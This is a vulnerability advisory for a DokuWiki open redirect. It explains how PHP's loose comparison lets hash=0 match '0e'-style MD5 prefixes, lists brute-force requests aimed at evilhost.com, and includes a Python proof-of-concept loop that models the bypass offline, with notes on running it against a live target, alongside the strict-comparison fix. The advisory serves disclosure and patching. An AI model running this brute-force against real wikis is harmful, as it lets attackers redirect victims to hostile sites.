PT-2012-52: Open Redirect in DokuWiki
Vulnerable software
DokuWiki
Version: 2012-10-13 "Adora Belle" and earlier
Application link:
http://www.splitbrain.org/projects/dokuwiki
Severity level
Severity level: Medium
Impact: Open Redirect
Access Vector: Remote
CVSS v2:
Base Score: 5.0
Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE: not assigned
Software description
DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database.
Vulnerability description
Positive Research Center experts have discovered an open redirect issue in /lib/exe/fetch.php. A legitimate request looks as follows:
/lib/exe/fetch.php?media=http://i.imgur.com/IX1g8.jpg&hash=4fae2b
The "hash" parameter is meant to stop fetch.php from being used as an open redirector: an external "media" URL is only accepted together with a hash bound to that exact URL. The hash is calculated as follows:
substr(md5(auth_cookiesalt().$media),0,6)
An attacker cannot obtain the value of auth_cookiesalt(); however, the "hash" parameter and the first 6 characters of the resulting MD5 are compared with PHP's loose "!=" operator, which compares two numeric strings as numbers rather than byte by byte:
if(substr(md5(auth_cookiesalt().$media),0,6) != $_REQUEST['hash']){
return array( 412, 'Precondition Failed');
}
Consider an attacker who sends a series of requests like these, each with a different "media" value and the same hash value of 0:
/lib/exe/fetch.php?media=http://evilhost.com/?1&hash=0
/lib/exe/fetch.php?media=http://evilhost.com/?2&hash=0
...
/lib/exe/fetch.php?media=http://evilhost.com/?100&hash=0
...
PHP treats a string of the form "0e" followed by decimal digits as a numeric string with the value zero, so a prefix such as 0e1234 or 0e1337 compares equal to "0" and the "!=" test does not fire. Roughly one in 1500 six-character MD5 prefixes has such a zero-valued numeric form, so within a few thousand requests one of the attacker's URLs is accepted, the protection is bypassed, and fetch.php redirects the victim to the attacker-controlled host.
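The bypass and the strict-comparison fix, modelled offline as an added example. This is not DokuWiki's code: the salt, the hostname (taken from the request pattern above) and the function names are constructed for illustration, and the PHP comparison rules are emulated in Python so the attacker's loop can be run without a target.

```python
"""Added example (not DokuWiki's code): model the fetch.php hash check with
PHP's loose string comparison and brute-force a "media" URL whose 6-char
MD5 prefix compares equal to hash=0. SALT is a constructed stand-in for
auth_cookiesalt(); the real salt is secret and irrelevant to the attack."""
import hashlib
import hmac
import re

SALT = "constructed-secret-salt"          # assumption: the attacker never learns it
ATTACKER_URL = "http://evilhost.com/?"    # request pattern from the advisory

# PHP's definition of a numeric string (sign, digits, optional fraction and
# decimal exponent). Two numeric strings are compared as numbers by == and !=
# in PHP 5, 7 and 8 alike, so "0e1234" == "0" is true. A bare "e" or any hex
# letter a-f makes the string non-numeric and forces a byte-wise comparison.
_NUMERIC = re.compile(r"^[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP's `$a == $b` for two strings."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def media_hash(media: str, salt: str = SALT) -> str:
    """substr(md5(auth_cookiesalt().$media), 0, 6) as in fetch.php."""
    return hashlib.md5((salt + media).encode()).hexdigest()[:6]


def check_vulnerable(media: str, hash_param: str, salt: str = SALT) -> bool:
    """The original check rejects when `substr(...) != $_REQUEST['hash']`,
    so the request is accepted whenever the loose comparison says equal."""
    return php_loose_equals(media_hash(media, salt), hash_param)


def check_fixed(media: str, hash_param: str, salt: str = SALT) -> bool:
    """Strict (`!==`) comparison: the bytes must match exactly. A
    constant-time compare on top avoids leaking the prefix via timing."""
    return hmac.compare_digest(media_hash(media, salt).encode(),
                               hash_param.encode())


def zero_prefix_count(length: int = 6) -> int:
    """How many hex strings of this length PHP reads as numeric zero:
    all zeros, or k zeros + 'e' + (length-k-1) decimal digits."""
    return 1 + sum(10 ** (length - k - 1) for k in range(1, length - 1))


def expected_requests(length: int = 6) -> float:
    """Average number of media variations before one hits a zero prefix."""
    return 16 ** length / zero_prefix_count(length)   # about 1510 for length 6


def find_bypass(salt: str = SALT, hash_param: str = "0", limit: int = 100_000):
    """The attacker's loop from the advisory: vary the query string, keep
    hash=0, stop at the first media URL the vulnerable check accepts."""
    for i in range(1, limit + 1):
        media = f"{ATTACKER_URL}{i}"
        if check_vulnerable(media, hash_param, salt):
            return i, media, media_hash(media, salt)
    return None


if __name__ == "__main__":
    hit = find_bypass()
    if hit is None:
        print("no zero-valued prefix within the limit (astronomically unlikely)")
    else:
        print(f"expected ~{expected_requests():.0f} requests; found after {hit[0]}: "
              f"{hit[1]} -> prefix {hit[2]!r}; vulnerable accepts: "
              f"{check_vulnerable(hit[1], '0')}, fixed accepts: {check_fixed(hit[1], '0')}")
```

Against a live target the loop body becomes an HTTP request and the acceptance signal is any response other than 412 Precondition Failed; the salt never needs to be known. Note that "000000" and forms such as "00e123" also evaluate to zero, which is why the count includes them.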
How to fix
Update to the latest version. For anyone patching by hand, the root cause is the loose "!=" comparison: the hash check must use a strict comparison ("!==") so that the two strings are compared byte for byte and never as numbers.
Advisory status
22.10.2012 - Vendor gets vulnerability details
06.03.2013 - Vendor releases fixed version and details
19.03.2013 - Public disclosure
Credits
The vulnerability was discovered by Arseniy Reutov, Positive Research Center (Positive Technologies Company)
References
http://en.securitylab.ru/lab/PT-2012-52
Reports on the vulnerabilities previously discovered by Positive Research:
http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/